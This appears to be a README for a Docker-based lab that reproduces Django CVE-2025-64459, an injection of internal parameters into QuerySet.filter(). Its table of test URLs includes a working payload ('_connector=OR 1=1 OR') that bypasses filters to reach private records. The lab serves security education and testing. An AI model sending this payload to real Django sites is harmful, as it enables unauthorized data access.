A self-contained testbed for Django CVE-2025-64459. Demonstrates QuerySet.filter() parameter injection via dictionary expansion using Docker.
CVE-2025-64459 is a high-severity vulnerability in Django (specifically versions < 5.1.14) that allows parameter injection in QuerySet.filter() when user input is passed directly via dictionary expansion (e.g., **request.GET).
Attackers can inject internal parameters like _connector to manipulate query logic (e.g., changing AND to OR), potentially bypassing filters and accessing unauthorized data.
If you have the Vulnerable Target CLI installed or want to run it from source:
-
Clone the Vulnerable Target repository:
git clone https://github.com/HappyHackingSpace/vulnerable-target cd vulnerable-target -
Run the lab using the ID:
go run cmd/vt/main.go start --id vt-2025-64459
-
b00m!
-
with Nuclei
| Description | Link |
|---|---|
| Show All (Empty Search) | /? |
| Normal Search | /?title__icontains=Public |
| Exploit Attempt (Private) | /?status=private&title__icontains=Area |
| _connector Exploit (CVE-2025-64459) | /?_connector=OR 1=1 OR&title__icontains=Public |
This repository is for educational and research purposes only. Do not use this on systems you do not own or have explicit permission to test. The author is not responsible for any misuse of this information.